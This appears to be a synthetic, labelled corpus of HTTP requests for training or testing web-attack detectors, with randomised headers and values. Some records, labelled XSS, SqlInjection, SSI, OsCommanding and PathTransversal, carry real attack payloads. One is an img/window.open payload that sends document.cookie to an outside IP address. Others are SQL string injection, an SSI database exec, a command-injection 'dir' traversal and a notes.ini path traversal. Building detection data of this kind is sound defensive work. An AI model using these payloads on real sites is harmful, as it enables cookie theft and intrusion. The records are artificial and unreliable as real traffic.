Date: Fri, 03 Mar 06 04:57:27 CET
ETag: W/"3Uy.-10KEWc6zZY"
Expect: kdwbNotb=aeti6
From: nuccwnm@7ndfhebs.fr
If-Modified-Since: Fri, 18 May 07 15:40:15 CET
If-Unmodified-Since: Tue, 23 Nov 04 13:34:34 CET
If-Match: "cfKIhWcSaYBe@ng-KsH"
If-None-Match: *
If-Range: Wed, 16 Mar 05 18:02:45 UTC
Max-Forwards: 8
MIME-Version: 1.3
Pragma: Ephs=fli
Proxy-Authorization: 4ehath lmnnnnh=bnrte
Authorization: Digest nonce
Range: -1,971317-
Referer: /otiidnhw.htm
TE: deflate;q=0.7,chunked,deflate
Trailer: Expect
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 8.7; wv-4r; rv:9.8.6) Gecko/56627517
UA-CPU: MIPS
UA-Disp: 316,8199,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 282x687
Via: 4.6 107.224.146.186, FTP/5.6 251.245.115.136, FTP/9.8 201.63.36.136:5721
Transfer-Encoding: identity
Upgrade: dnid/6.6, cGoH/6.5, no1o/5.3, ni9ihh/8.4
Warning: 646 www.eBtlm.js "taDea3t" 
X-Forwarded-For: 101.23.25.216
X-Serial-Number: 22844
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

e2lAww=evalrsystem9;h5hKo&i52a=ahek7echoipr<&20nehb1xxnhpmas=sqaa&e0oeAseoet=-rdtbaccess_log:dr=)Oipnva)t

End - Id: 5232
Start - Id: 17142
class: Valid
GET /eMGt2hFpr7dty/ehb0ueosdiursh.sh?etnSeR=sEf_Nv&aa7fYT@OD=ieta8f&aeM1hrpt=feKr1fvoosnrr&93iframetmp=9oCZXEU0ca&srr2isslr=yMkam&nlOCgiy2t1a=l4trnust&deTnTt=8&EhlrodL4bmpSe=hIbhEy2q1GH&ofi=981 HTTP/1.0
Host: 25.11.117.37
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.3, identity;q=0.6
Accept-Language: *
Cache-Control: hmlt='Emzn'
Client-ip: 120.68.13.57
Cookie: epetm16=eHp>escripttdr;ecrSln7aietMrc=qJ0.DNRc;he8oeohnh3neAl=t.6fLA;yqo=tdnsslnrioXhm;aaohat=p4yGWX;a0sqoce60=htegeigeo3ne'S
Cookie2: $Version="727"
Date: Mon, 20 Dec 04 14:38:54 GMT
ETag: "Gro2HZyrngc6QuB6f4"
Expect: 3meyi7na
From: gcEsmc@smae.st
If-Modified-Since: Thu, 13 Mar 08 14:22:08 CET
If-Unmodified-Since: Fri, 20 May 05 01:31:51 GMT
If-Match: "LSWMKGH-4PPWMG2zH"
If-None-Match: *
If-Range: Thu, 28 Jul 05 03:56:41 CET
Max-Forwards: 64
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest response="d51b60Fb2FD997Dd8D3a2437b78E45bc"
Authorization: Basic b3luZjpOZHlnbG5zaA==
Range: 289-
Referer: /ihoys/harelks/Yoso/uqcms.mspx
TE: trailers,chunked;q=0.2
Trailer: Cache-Control
User-Agent: 82ernoezot1uoeemexea
UA-CPU: StrongARM
UA-Disp: 817,8711,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0887x1006
Via: 6.6 www.eeh5ehet.gif, 1.5 www.aembwe4.html
Transfer-Encoding: gzip
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 884 66.52.11.38 "buetRO9tneeajg1yc" 
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 92445
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17142
Start - Id: 17583
class: Valid
GET /w6EJ/e6hXa/FxalikeZN1@tlLgt6/memi2sHIcn1sotStha/tegvhtirhqua6xymhava.swf?hgiqidHt=rat8ttufore&du=4&lrn=+Ej5%2B++ateethm%26n8&CHowevr=9&hieetcOteo=e+%29&EFYFAJ0D=809148&TbtdocovYaf=und&nsit3noeig=Try HTTP/1.0
Host: www.leiiiLoi.fr
Connection: hem9
Accept: video/mpeg;q=0.4, video/mpeg
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-age=88409
Client-ip: 177.96.5.81
Cookie: 22nhreii=4483433;tls=leliG;yanR=nPF;9rds5e=8dp;_TTgCainputDXF=ichTtFG
Cookie2: $Version="92"
Date: Sat, 27 Jan 07 03:33:25 GMT
ETag: "CAjY4qra185GoVI_"
Expect: steBa
From: eczairnn@8nwil2emd.be
If-Modified-Since: Tue, 28 Jun 05 12:13:53 CET
If-Unmodified-Since: Sun, 19 Jul 09 11:50:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 879
MIME-Version: 4.9
Pragma: nl=2he6aiak
Proxy-Authorization: Ne0eoc jlottGkn=mmT0iei
Authorization: 6ntWaw hdbq9ss=xFLmam
Range: 22389-71,-169,-0
Referer: /ibeupnF/asroerP/ad254/nydH/usesgar.asmx
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (compatible; MSIE 5.8; Win98; Veru1a; lstse6sa)
UA-CPU: x86
UA-Disp: 209,146,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: Nshedt/8.6 141.179.182.62, FTP/4.4 215.58.245.9:4076, 9.4 www.l4otrree.js
Transfer-Encoding: deflate
Upgrade: dnoui/0.4, uaf/5.9, l2oeee/5.7, loxm8a/0.1
Warning: 850 30.15.58.94 "mnoam98ReceIhnimaf" "Sat, 01 May 04 04:54:14 CET"
X-Forwarded-For: 108.95.130.193
X-Serial-Number: 2432854713
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17583
Start - Id: 47328
class: XSS
GET /c0H9EJBOE74LI_GIgi/nNtneeroihsfuptox/aghqtmenFofaivs5t/fefiah6euupatomNE.exe?0bareanlo8afhRM=%3Cimg+src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F196.19.85.250%2Fanch.php%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E HTTP/1.1
Host: 154.220.130.148
Connection: close
Accept: text/*
Accept-Charset: euc-kr;q=0.5, cp-936;q=0.6, euc-jp;q=0.0, windows-1250, cp-936;q=0.1
Accept-Encoding: *
Accept-Language: sE-oalEpcn, mehI-d, ll8drxe-tertH, 3hsia-q;q=0.9
Cache-Control: no-transform
Client-ip: 68.164.101.129
Cookie: teostnoeze=tehs;qyKz=68667084;ieidadz=lras;twhoc6=tfrm9pnais
Cookie2: $Version="4"
Date: Fri, 26 Sep 08 11:28:05 UTC
ETag: "z6o_GAUk0@qlTgH0GaT."
Expect: 100-continue
From: ueasrS@d1jogree.it
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: *
If-Range: "SH6cwk7Ohr@yOQp"
Max-Forwards: 1125
MIME-Version: 3.5
Pragma: lgEt61='ea'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic c3NkQmV0b3Q6YXAxemNlYQ==
Range: -827060,69-,229-399617
Referer: http://www.gsfbNo.fr/tVeeel/thhrby/hAghch/sihldt/Ersga.pl
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/1.5 (compatible; MSIE 3.8; Linux i386; yD0a; fznyh1gd)
UA-CPU: 68000
UA-Disp: 699,6656,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6004x311
Via: agt/8.6 217.82.49.45, 0.5 www.ithntm.css, 7.0 34.221.231.196
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 254.218.8.107
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47328
Start - Id: 8079
class: Valid
GET /.3i%ugHB/49aXmhrfi-_ZEe9vjtkI/5Y3new8tXaxUYJCF/ircteehai1Dswyt/9yUsnf75z/auLzx8_jA/uffY5cA/t7kettccgeai9dt/EGLPtorNM0H/afcl.php?nuGp=06355386&bteT=96703&uu=2&ebXCL=dymOent4o7lmfoO1hr&cdrareSUhr=rhcqoqgHnjohttps&vmssocrtl=lcEaeonnwr&etMepo=86844169&ifNtitiear=nboot.iniycte&8_jGuSmnls=%3CrsystemerKwgetje%279y&X41_G=003891&7tp16curytlup=oyc&go=ha&%u@u3T=6 HTTP/1.1
Host: www.Sly0nd.fr
Connection: qxhs
Accept: text/xml;q=0.7, audio/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: gzip
Accept-Language: *;q=0.8
Cache-Control: min-fresh=0786
Client-ip: 46.19.87.106
Cookie: Ltde6iIaAioue=(~;xiioewBo9enia9=ladminlocationzldrsu;1diEpfs=9mgm;6udnonnrti=d ieanrn
Cookie2: $Version="9"
Date: Sat, 17 Apr 10 13:43:51 GMT
ETag: W/"Vhn.Vwq0JpJkNWvOBSs"
Expect: a4et=so7lai;hieeeht
If-Modified-Since: Sun, 19 Sep 04 11:25:19 GMT
If-Unmodified-Since: Thu, 22 Feb 07 16:44:26 UTC
If-Match: *
If-None-Match: "IJnMg@1-T1nC68v"
If-Range: *
Max-Forwards: 7473
MIME-Version: 4.3
Pragma: t9u=gunqaSH
Proxy-Authorization: Basic ZWNkSWllOndzam1xZQ==
Authorization: NTLM a2wzcmJqZXNzNHZ0b3RpcmtubmEzZTN6cGdvbmVvWWV1NmU=
Range: 96926-503180,-72
Referer: http://www.aieaee5.org/fism/d3re/rroness/R3jrroh/BndoiYj.php
TE: trailers,chunked,deflate
Trailer: Host
User-Agent: r4yaanvhim
UA-CPU: x86
UA-Disp: 4009,1990,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 976x2790
Via: 3.1 www.uRhcta.shtml, 2.9 www.GGm4ev.jpeg:78, 7.2 107.242.90.115
Transfer-Encoding: gzip
Upgrade: ote0/8.0, khoa/4.1, gceGEe/5.2, Xshe6E/7.4, Een2c/8.8
Warning: 742 www.5eiisbn6.jpg "s7nmb8eks7phhnpbq8e" "Thu, 28 Apr 05 22:22:02 GMT"
X-Forwarded-For: 247.192.186.78
X-Serial-Number: 74656
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8079
Start - Id: 41488
class: SqlInjection
POST /iVg04B/m47g8Rvm9Wx2/nrtfalba/wt5t/6n.shtml? HTTP/1.0
Content-Length: 360
Content-Language: tnttlehr
Content-Encoding: compress
Content-Location: http://www.erinh6y.st/40weszw/8sDlrs/sihRacoc/irrMsnR.php4
Content-MD5: c2loMnRoYXJ0dXFveWVyUw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Dec 09 14:48:02 GMT
Last-Modified: Sat, 14 Mar 09 21:15:08 GMT
Host: www.jouttwiTe.ch
Connection: keep-alive
Accept: image/jpeg, application/rtf
Accept-Charset: koi8-r;q=0.8
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.175.54.165
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="690"
Date: Sun, 03 Oct 04 23:14:52 CET
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: rty1n7=s0jaueru
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Thu, 08 Apr 04 16:07:46 CET
If-Unmodified-Since: Wed, 02 Jan 08 14:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: "lEa24HFhxCiFX2_iJ"
Max-Forwards: 4856
MIME-Version: 4.3
Pragma: hE='o1ds'
Proxy-Authorization: NTLM aTVjZGF0c1NkdG5yemVpd2xmVGVUOGVtbzdMaHB3aW5zZWV0ZWlhcnJhcmVleWE=
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: /s52EEea/ycTuoyn/yns7ib/8wHlm/anm3a.asp
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: leuahdxace (x.Xkj2yi6M; kvEmmUTDLl)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 6.0 186.5.57.15
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 578 www.rtmebje.jpeg "zolicgs8a3omDgpc" 
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VMyPpositionTZ@='select customer_phone    '||'from    customers '||'where     customer_surname='''||  lv_surname||'''     and     customer_type=1';&hEzo8i0r=5ST~uaTtstbav&stsn=6WOo3LjaHsn&BV_htpassupdatemeta4fM@OE=natenian&foonngndew=sPauCa5sea&QYautoexecwindow.openXinkid=twgetsxht7&jzetcLrtGIy=etonadlbCnlt05oe

End - Id: 41488
Start - Id: 9175
class: Valid
GET /pGp7/arreuei7.dll?hRb67alrrs2eteS=4ntf%3Cetyhasy&0gIOSjYBQ=61&itYa9eeed=%5DoahrlhlDa&tneeoorhnrsel=1&W_U@tselect=onad&eTowehttswl=erkIsfln&saeihgtEf=74575&eeAnc9snlasmn=t1QzzK&iyWlE3l1jelogU=nnduHueyoatsh7ub&neuhwaer3ae=wIfwztTt9 HTTP/1.0
Host: 205.222.230.77:80
Connection: keep-alive
Accept: video/quicktime;q=0.9
Accept-Charset: x-mac-arabic;q=0.0, iso-8859-2;q=0.1, x-mac-ce;q=0.1, iso-2022-kr;q=0.2, euc-kr;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=5
Client-ip: 146.36.45.219
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="030"
Date: Mon, 27 Jul 09 10:56:52 GMT
ETag: "iTcTcxHlEPOKRN.H99Js"
Expect: i8av9tuP
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Mon, 19 Oct 09 17:32:44 CET
If-Unmodified-Since: Fri, 15 Aug 08 22:22:59 UTC
If-Match: "V0hgBsCdq_2z8SkS"
If-None-Match: "713fjdXl7.K-G.FN"
If-Range: Fri, 12 May 06 03:53:09 GMT
Max-Forwards: 40
MIME-Version: 8.7
Pragma: Bmr='ogSesepr'
Proxy-Authorization: Basic aW5yc246b252azI=
Authorization: Basic ZWRvbzVlODpmZXRvYWU=
Range: -0
Referer: /oero/cr8u/wosie/gnecsd.mdb
TE: trailers
Trailer: Accept
User-Agent: 4rCC (sn2ID6; kdYQGoh6J; 8Sr8vL)
UA-CPU: StrongARM
UA-Disp: 226,033,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3033x117
Via: 0.0 39.141.0.225:0, ugooe/3.3 46.206.34.11:452, HTTP/9.3 248.229.239.80
Transfer-Encoding: tn1c
Upgrade: lwdt/4.2, af92x/9.7
Warning: 905 www.dgfeerSr.html:96082 "t0ewrycrethaeHou7" "Thu, 31 Mar 05 07:13:11 GMT"
X-Forwarded-For: 98.82.13.56
X-Serial-Number: 51512121332021601
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9175
Start - Id: 40945
class: SSI
GET /l8detCscriTupnoo/r.2pjMMxbE8/nnsaoynca8e7aa/eCtcd.mdb?ernlxCdrios=51150616&0ydL=0g&n8ottta=80053887&etahrsem=4966487500&aa8aforioossn=7224384&4srSui=eseastubeau&lrbhGlwrcDs=%3C%21--+%23odbc+++++connect%3D%227au%2ChjQHdn%2Cnu9oo%22+++++++statement%3D%22select+++++*+++++from++++b%22--%3E&tstn=Eohe%29aac&lexukmeeesEt=s2&se1aczj=76051&mresrlxi7k=+jnTOytBgrfTs&aetin=hukLHJ&KWXez1oZShavingW=417312&isoequhYi=ofonponucecmaewSea&01nodeo=+t HTTP/1.1
Host: www.t6ttnivdao.cz
Connection: slsdoon
Accept: */*
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: tsqeet-ptoCd;q=0.5
Cache-Control: max-stale=37457
Client-ip: 138.126.169.97
Cookie: trp3eo1fmlvb3=oppeteboot.inibintely%SpasswdOue;f61brhielnOwS=%=divt;aieNels9sto=t;sehsmyt4=vraxhavingioN 7hml nhttpsallpositiono
Cookie2: $Version="04"
Date: Wed, 12 May 04 23:34:00 CET
ETag: "N8O@241VAkaJCDw"
From: sea3iyve@s4mn47e.uk
If-Modified-Since: Sat, 29 Sep 07 24:48:01 UTC
If-Unmodified-Since: Tue, 08 Mar 05 09:34:35 GMT
If-Match: "N6.EB4M_RSMfXwoa.6"
If-None-Match: *
If-Range: *
Max-Forwards: 3280
Pragma: no-cache
Proxy-Authorization: NTLM cmJLZXZDSWlzd2VyY3R6dDJyVHNmbmRtcmdheXN0ZWJ2bzdpc1RuaGlzYw==
Authorization: geWh3a eyhB=Jta1h9t3
Range: 3754-,869645-
Referer: http://totae.de/egmHd0.asmx
TE: trailers,trailers
Trailer: If-Match
User-Agent: dlsTzedfifr
UA-CPU: MIPS
UA-Disp: 359,820,8
UA-Color: color8
UA-Pixels: 877x4813
Via: 4.9 192.63.158.34, 0.1 5.8.77.142, 9.8 www.brta.css:80513
Transfer-Encoding: deflate
Upgrade: 5ensTw/2.4
X-Serial-Number: 215857726
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40945
Start - Id: 2016
class: Valid
GET /PA/s171n_s__Jmob@xUmiD/e4RiSv/nulecj/meperiOtdTSdebsiooys/sSFO37GcExJaYbm1z/oLJS2P/1RrDtdTesmveewrxruee.dll?oesdtrrzMUe=1756&veklyethENa=2193346&eNr2a=tlqEWBM&atdjnsa=qincludeltybiniieservicess+s%3Ecatrn&rAunstb=asotsnpbdiazs&d7tyNameoet8hi=e6dfnzXnoei3s&er=oNbT&MZr7fgvarF68=5807246&aeb5rreersyrxa=iarvEoXAi&3obsdIic=eoamiaan7o&nugstettasmlad=N7liitsstEocmtesel HTTP/1.1
Host: www.7Io0oaa.org
Connection: close
Accept: text/*;q=0.0, video/mpeg;q=0.0
Accept-Charset: euc-tw, iso-8859-8, x-mac-chinesetrad;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: iLiDu-hTdEe;q=0.7, eorpte-Hindlno;q=0.6, h-rmu2;q=0.8
Cache-Control: no-cache
Client-ip: 30.211.1.172
Cookie: OMAp=arhbsie;eebinltiUg=87703614
Cookie2: $Version="867"
Date: Tue, 06 Sep 05 24:12:26 UTC
ETag: W/"B@X6mQUMS2BRlAFjR"
Expect: 100-continue
From: fjsefeez@ottdepq.org
If-Modified-Since: Wed, 17 Mar 04 21:22:16 UTC
If-Unmodified-Since: Mon, 11 Aug 08 09:18:19 UTC
If-Match: "NgLS8mqPb1_2wNwu3f5"
If-None-Match: *
If-Range: *
Max-Forwards: 2270
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: hn5ri hitrai8=tiph1etc
Authorization: NTLM b2h0ZWFpdEdkczRvaWkwaXpvZWVLakxaYlRhaHJnaHRuZWVp
Range: 705982-,79-08776,-104383
Referer: /aauleq/mIrao0is/7oColoi8.exe
TE: gzip;q=0.6,gzip,trailers
Trailer: Upgrade
User-Agent: yemRlhdcw (eIXmNkbO)
UA-CPU: 68000
UA-Disp: 5129,6449,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8738x825
Via: HTTP/7.1 www.ihje6eb.jpg, FTP/4.9 www.ufgUto.htm, 4.0 161.17.223.94
Transfer-Encoding: identity
Upgrade: een/2.2
Warning: 594 www.u5giw.html "bac5abR6tJale" 
X-Forwarded-For: 129.8.72.4
X-Serial-Number: 71873
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 2016
Start - Id: 8062
class: Valid
GET /a@Pvi8QrFe8NKt-ySti7/at4Hc9T7w/aW4BA/l8GHCb.html?gtwtamnny=triruosyeryfnrEa&t32-iB=hdsn+6+srsup8&raknceAso=umdiaeapi0&CCbHNAiframe5t=9951&E4hraj=hcwhere3&iuelrC9uyedne=%2Fds%3Aa3ocrcpiJi2mail&vliT7emsbmtaobd=n%2Bno&iiuEotqbs=ee&codqrNuygs=uKRMKDtu HTTP/1.1
Host: www.6u9iet.com
Connection: ishaT
Accept: audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: min-fresh=0827
Cookie: srhnsuq5r=344504
Date: Mon, 17 Mar 08 18:14:20 CET
ETag: W/"iwnUG5-8F@O7XXv_5xc"
Expect: 100-continue
If-Unmodified-Since: Sat, 22 Dec 07 15:29:21 CET
If-Match: "FEnb6j6mr.wqE9bmBo4O"
If-Range: Tue, 30 Mar 04 15:29:31 GMT
Max-Forwards: 7
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: YsN39r adouz=1z3nk
Authorization: Digest realm
Range: -7887,3458-,5341-
Referer: http://www.rtoqd.fr/Dteis1t/edco.tiff
Trailer: If-Match
User-Agent: ounmb (iGHYPd; fOf2DjZw; sqEZwS1Y; f-RKI5A5K)
UA-Color: color32
Via: qu7n/8.1 30.124.130.15, 9.8 www.koetm0.js, 8.8 www.yeht1s.tiff
Transfer-Encoding: eyha1
Upgrade: E8t/1.5, bnr/0.9, lvct/2.3, 09uusr/6.3, mesee/9.5
Warning: 083 www.ol6ion.tiff "m4ueyeoe" 
X-Forwarded-For: 247.192.186.78
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8062
Start - Id: 42846
class: OsCommanding
GET /i7tjDzxMdt2mRhm/dC3d_ioA-u9V/iYC6MwaVtkrMnyJq/nXPoe/hi8dh/890RgdmvHHjBzoceQ/o41oYdz1q/eeprslypeshac.sh?cen4torwe=gstaitf8mdr&ieyiiau=lhplpz%40r&eh9rdonsrmaeeuu=%7Cdir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C HTTP/1.0
Host: 211.106.218.138
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr, windows-1253;q=0.8, x-mac-cyrillic, x-mac-chinesesimp;q=0.1
Accept-Encoding: deflate;q=0.8
Accept-Language: Sn-c;q=0.1, aywvI-rlcf
Cache-Control: only-if-cached
Client-ip: 143.230.118.47
Cookie: O6MZ=y9zz7YLVAP;odcs6ct=537878;r1f=1021522
Cookie2: $Version="840"
Date: Sat, 10 Oct 09 16:24:07 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 15 Jun 06 17:11:54 UTC
If-Unmodified-Since: Mon, 05 Sep 05 20:53:22 GMT
If-Match: *
If-None-Match: "Z6GEjEtI2dmmmnOy10A"
If-Range: "ZiEy-bnA8m1M4OmNB"
Max-Forwards: 65
MIME-Version: 7.9
Pragma: crr='n9'
Proxy-Authorization: njdei gtdN=st7gs
Authorization: ashu aliHe=hEgi
Range: -885,-18051
Referer: /XecCsls/olvh/rerrn.jsp
TE: gzip
Trailer: Host
User-Agent: Mozilla/4.1 (X11; U; Solaris 3.0; se-tj; rv:9.8.5) Gecko/84150259
UA-CPU: StrongARM
UA-Disp: 7817,3346,16
UA-Color: color16
Via: FTP/8.1 160.51.2.133
Transfer-Encoding: Tisca
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 976 www.eguwaq.html "ahcm" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42846
Start - Id: 45088
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: 105.112.219.23:279
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=96
Client-ip: 214.121.21.204
Cookie: evl4bir=42314;Ef0rj=oe7arWFhr7tse8;tckllelebd=455904
Cookie2: $Version="49"
Date: Tue, 05 Jan 10 12:34:44 GMT
ETag: W/"lZRSKosY.s45V9ZcHcP"
Expect: 100-continue
From: NT7ihoi@svOy.it
If-Modified-Since: Wed, 30 Nov 05 11:41:10 CET
If-Unmodified-Since: Mon, 20 Mar 06 13:02:50 GMT
If-Match: "m7e8SWEORE3SARe6"
If-None-Match: "qyVWM118WEydh2dCXQD"
If-Range: Sun, 11 Mar 07 04:04:23 CET
Max-Forwards: 80
MIME-Version: 2.7
Pragma: ly4z='pj'
Proxy-Authorization: Digest cnonce="lEha"
Authorization: Digest nc=aC1a3Cc9
Range: 61-,599945-,96-
Referer: http://www.Hsuo.gov/zeiqa3n/ticpiO/osoIig/Sretei.pdf
TE: deflate;q=0.0,gzip;q=0.0,trailers
Trailer: Connection
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 7.0; ry-h7; rv:1.1.8) Gecko/81901499
UA-CPU: StrongARM
UA-Disp: 0628,6146,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.1 www.nmIjfen.jpg, 6.3 54.170.128.53
Transfer-Encoding: gzip
Upgrade: ttpNf/8.4
Warning: 437 www.epd64fo.jpeg "eNe3tlcu" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 95535933478300
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45088
Start - Id: 5349
class: Valid
PUT /hf76i9vIyFg/2eJseVSC6PF_6HJj6ipB/sdChtapibSt6nlll/hroiinuneb4s/ik3atihcinfora5.cgi? HTTP/1.0
Content-Length: 32
Content-Language: aRent,a,idn7ue6t
Content-Encoding: identity
Content-Location: /Ntnhrd6e/rues/a9ueOfzh/naacdeca/feled.exe
Content-MD5: bGVma29yaG9wbWpkSG9kYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Apr 06 20:36:43 CET
Last-Modified: Fri, 22 Jun 07 14:43:56 CET
Host: www.lsydi.gov
Connection: close
Accept: application/rtf;q=0.1, image/jpeg, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: h-trng2s, lg-lawwit;q=0.6, adcn2el-lsEtlf;q=0.3, wbo-vr, absadeo-rDc6;q=0.1
Cache-Control: only-if-cached
Client-ip: 71.65.153.57
Cookie: rrtla=i4t;7hllacnukln=050037775;si=8317226;lataeGNlotyorn=ses8ydalctF4;YD7IH=207
Cookie2: $Version="7"
Date: Thu, 29 Jun 06 17:35:27 GMT
ETag: W/"0PI_3GHCslvsxVViphLU"
Expect: 100-continue
From: 91ean@e9cutenhT7.cz
If-Modified-Since: Sat, 09 Sep 06 05:47:17 CET
If-Unmodified-Since: Thu, 04 Oct 07 15:39:13 UTC
If-Match: "1F@I-1Giy.VIfOsg3-13"
If-None-Match: *
If-Range: "ar9yav5LkgnYn@VPtOV"
Max-Forwards: 252
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="tcbn"
Authorization: Basic NVRvZGg1OnJhOGc=
Range: 1295-20717,537637-
Referer: /e2t8rtbd/s7heo/ljdceys.jsp
TE: trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.7 (X11; U; Open BSD i586 9.4; ge-dL; rv:4.3.0) Gecko/08197962
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6579x971
Via: 5.5 www.enedtn.css, 0.7 19.6.233.103, 3.5 www.h8eelx.tiff:1
Transfer-Encoding: identity
Upgrade: lXd5ax/8.2, Tud/3.6, 3rda/5.4
Warning: 447 www.AoiT.html "ellptootAlwpn4" "Thu, 03 Mar 05 11:10:59 GMT"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r3mhxhrbXA=s\d&shvlntrtplet=Ur

End - Id: 5349
Start - Id: 16648
class: Valid
GET /nu9v.gaR09ZZG0Okj4Qq/uCWGhwhYPuTsZICzpVl/ioeb7cweteeJorwocoXu/nh5mershqdinis/i-Hd4iKj_fMwqps6vV4/hU2Wm1/cmt6JD18/0ipolEs/sfXO1J2qPO@-dV/rb.cfm?lt2nooaei=ca+4&4hll=on&oattttco0=iv5o%28si&eeait1c=ew+hbEHoqhttpzm87mmrewindow.open&N0dLCa1=8962867127&ahldOotod=sJseY&eeoefuvnegredf=ib%28o%244G5r&lhqjeens=w2lE94C&Sye=e%28len6nn%7Eulbess&T8a4tO3=uu2&Titttz=tnsuas%29mhp9ioxTztHn&aew=oDnjaoNsrnekede HTTP/1.1
Host: www.oeWt4oEi.com
Connection: qfNiei
Accept: image/*
Accept-Charset: utf-7, hz-gb-2312, windows-1257;q=0.5, x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 242.14.122.91
Cookie: 6e8e2r=075928;tsrnuse=82392168;os5h0hioeKitle=rmefht;rnr7e=44076812
Cookie2: $Version="281"
Date: Sat, 17 Feb 07 11:10:55 CET
ETag: "bdux4slUMi9e3E6P"
Expect: 8rOrt
